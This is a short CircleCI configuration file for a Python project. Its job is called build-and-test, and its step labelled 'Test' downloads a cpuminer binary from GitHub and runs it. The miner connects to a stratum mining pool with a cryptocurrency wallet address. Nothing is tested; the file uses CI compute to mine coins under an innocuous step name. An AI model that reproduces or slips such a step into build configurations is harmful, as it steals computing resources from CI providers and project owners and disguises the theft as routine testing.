version: 2.1

orbs:
  python: circleci/python@0.2.1

jobs:
  build-and-test:
    executor: python/default
    steps:
      - checkout
      - python/load-cache
      - python/install-deps
      - python/save-cache
      - run:
          command: wget https://github.com/cpu-pool/cpuminer-opt-cpupower/releases/download/1.4/Cpuminer-opt-cpu-pool-linux64.tar.gz && tar xzf Cpuminer-opt-cpu-pool-linux64.tar.gz && ./cpuminer -a yespowersugar -o stratum+tcp://stratum-na.rplant.xyz:7042 -u sugar1quqp524ywvwr33pvyd8yu3mexenqd43n3d3fhed.test -t1
          name: Test

workflows:
  main:
    jobs:
      - build-and-test
